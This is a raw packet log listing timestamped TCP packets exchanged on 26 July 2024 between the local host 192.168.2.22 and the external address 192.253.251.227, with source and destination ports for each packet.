Jul 26, 2024 13:02:58.240098953 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240138054 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240169048 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240200996 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240231991 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240247011 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240262985 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240298986 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240401030 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240432978 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240463018 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240469933 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240513086 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240545034 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240580082 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240592003 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240612030 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240645885 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240649939 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240679979 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240710974 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240720034 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240744114 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240786076 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240849018 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240880013 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240911007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240920067 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240942955 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240973949 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241005898 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241008997 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241148949 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241180897 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241185904 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241211891 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241244078 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241286039 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241288900 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241379976 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241410971 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241441965 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241449118 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241476059 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241513014 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241525888 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241558075 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241590977 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241626978 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241638899 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241671085 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241702080 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241705894 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241734982 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241765976 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241796970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241806984 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.241830111 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241861105 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241894007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.241898060 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243247032 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243295908 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243359089 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243391991 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243439913 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243446112 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243472099 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243504047 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243540049 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243596077 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243628025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243659973 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243690968 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243695974 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243722916 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243757010 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243794918 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.243819952 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243850946 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.243978024 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244009018 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244024992 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.244040012 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244071960 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244103909 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244108915 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.244134903 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244167089 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244172096 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.244199991 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244234085 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244268894 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244275093 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.244330883 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.244373083 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323293924 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323364019 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323399067 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323411942 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323431969 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323467970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323517084 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323549986 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323558092 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323558092 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323581934 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323616028 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323621988 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323647022 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323678970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323688030 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323710918 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323745966 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323751926 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323832989 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323874950 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323925972 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.323945999 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.323977947 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324038982 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324070930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324084997 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.324105978 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324142933 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.324213028 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324240923 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.324281931 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.325061083 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325093031 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325124979 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325139999 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.325158119 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325228930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325258970 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.325259924 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325293064 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325319052 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325334072 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.325911045 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325961113 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.325963020 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.325993061 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326034069 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.326097965 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326145887 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326179028 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326193094 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.326212883 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326240063 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326251030 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.326801062 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.326858997 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.717926025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.717997074 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718046904 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718080044 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718082905 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718113899 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718146086 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718159914 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718180895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718211889 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718240976 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718250990 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718278885 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718293905 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718305111 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718312979 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718353987 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718445063 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718461990 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718509912 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718566895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718581915 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718595982 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718611956 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.718631983 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.718657970 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.719386101 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719434023 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719448090 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719476938 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719496012 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.719537020 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719582081 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.719656944 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719671011 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719686985 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719717026 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.719873905 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719887972 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719902039 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719916105 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719928026 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.719930887 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.719990969 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720168114 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720181942 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720195055 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720208883 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720223904 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720223904 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720237970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720243931 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720252037 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720280886 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720460892 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720474958 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720511913 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720519066 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720525980 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720541000 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720555067 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720570087 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720572948 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720583916 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720592976 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720643044 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720906019 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720921040 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720933914 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720948935 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720963001 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720971107 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.720977068 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720992088 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.720999956 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721009970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721035957 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721368074 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721381903 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721395016 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721406937 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721421957 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721417904 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721437931 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721451998 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721452951 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721466064 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721493959 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721678972 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721693993 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721709013 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721731901 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721769094 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.721822977 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721838951 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721852064 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721859932 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721867085 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.721934080 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723220110 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723385096 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723438025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723450899 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723495007 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723536015 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723551035 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723565102 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723578930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723592043 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723627090 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723747015 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723761082 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723776102 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723788023 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723812103 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723838091 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.723871946 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723885059 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.723942041 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.724653959 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724690914 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724705935 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724761009 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.724848032 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724862099 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724877119 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724890947 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724910021 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.724915981 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.724934101 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725018024 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725033045 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725047112 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725056887 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725083113 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725146055 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725161076 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725188971 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725231886 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725246906 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725260019 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725275040 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725282907 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725289106 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725303888 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725316048 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725316048 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725331068 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725334883 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725366116 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.725658894 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725672960 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.725734949 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728082895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728096008 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728162050 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728321075 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728351116 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728365898 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728399992 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728513956 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728529930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728543997 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728559017 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728576899 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728604078 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728643894 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728658915 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728696108 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728743076 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728804111 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728817940 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.728832006 CEST	57484	49184	192.253.251.227	192.168.2.22
